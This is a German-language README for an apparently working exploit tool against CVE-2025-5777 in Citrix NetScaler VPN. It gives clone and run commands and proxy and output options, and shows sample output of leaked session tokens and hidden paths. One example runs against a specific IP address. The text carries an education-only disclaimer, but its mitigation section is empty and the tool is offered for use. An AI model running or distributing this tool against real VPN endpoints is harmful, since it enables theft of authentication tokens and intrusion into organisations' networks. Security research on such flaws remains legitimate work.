
Async-basiertes Exploit-Tool für CVE-2025-5777, das durchgesickerte Authentifizierungstoken, interne IPs und versteckte Endpunktpfade von anfälligen Citrix NetScaler VPN-Endpunkten erkennt und extrahiert.
Ein leistungsstarkes Bildungswerkzeug, das entwickelt wurde, um die Schwachstelle CVE-2025-5777 zu demonstrieren und zu analysieren, die Citrix NetScaler VPN betrifft.
Dieses Projekt ist Teil der GO-TO CVE-Initiative.
⚠️ Nur für Bildungszwecke. Verwenden Sie dies NICHT auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.
Dieses Skript versucht, vertrauliche interne Token, interne IPs und versteckte Endpunktpfade zu erkennen und zu extrahieren, die von verwundbaren Citrix VPN-Endpunkten offengelegt werden.
Es wurde entwickelt, um Studenten, Sicherheitsforschern und Red Teamern zu helfen, besser zu verstehen, wie reale CVEs entdeckt und analysiert werden.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Erfordert Python 3.8+ Optional: Sie können eine virtuelle Umgebung verwenden
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 hinzu, um über Burp/SOCKS zu leiten--silent hinzu, um die Ausgabe zu unterdrücken--output result.json hinzu, um als JSON zu speichernBeispiel:
python3 exploit.py https://20.237.190.100 --output leaks.json
[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
und
Um die Ausnutzung dieser CVE zu vermeiden:
Dieses Tool wird ausschließlich für Bildungs- und rechtmäßige Forschungszwecke veröffentlicht. Der Entwickler übernimmt keinerlei Verantwortung für Missbrauch oder illegale Aktivitäten, die unter Verwendung dieses Codes durchgeführt werden.
Durch die Nutzung dieses Tools stimmen Sie zu, dass:
Treten Sie der CVE-Leak- und Exploit-Forschungscommunity bei: 👉 https://t.me/GOTOCVE
Entwickelt von Ali Soltani – Red Teamer und CVE-Jäger.
Stolzer Teil der GO-TO CVE